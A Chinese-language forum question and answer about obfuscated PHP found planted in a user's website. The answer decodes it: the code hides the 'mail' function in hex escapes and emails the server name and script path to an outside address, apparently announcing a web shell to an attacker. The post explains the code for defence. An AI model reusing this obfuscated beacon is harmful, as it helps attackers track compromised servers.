use*_*793 1 php code-injection
我发现这个嵌入在我网站上的一个php文件中,谁能告诉我它的作用?
$x0b="\x6da\x69l";
$ms = $_SERVER["S\x45R\126\105\x52_\x4e\101\x4dE"].$_SERVER["\123\x43R\111\x50\124_NA\x4d\105"];
$sub = "\x73\x68\145\x6cl\x20\076\076 :\x20" . $ms;
$o = array ("\x6fm","\164ma\151","\152\x5f\141\155\x72\x31","\x40\x68\x6f","\154.\x63");
$ee = $o[2].$o[3].$o[1].$o[4].$o[0];
$send = @$x0b($ee,$sub,$ms);
它创建了4个变量.第一个变量$ x0b是要使用的函数的名称"mail".
$x0b = "mail";
最后3个变量是发送电子邮件的人,主题和邮件正文.
$ee = "j_amr1@hotmail.com"
$sub = "shell >> : file.php" ( file.php is the name of the script that contains this code )
$ms = "file.php" ( same as above )
你知道你被黑了:)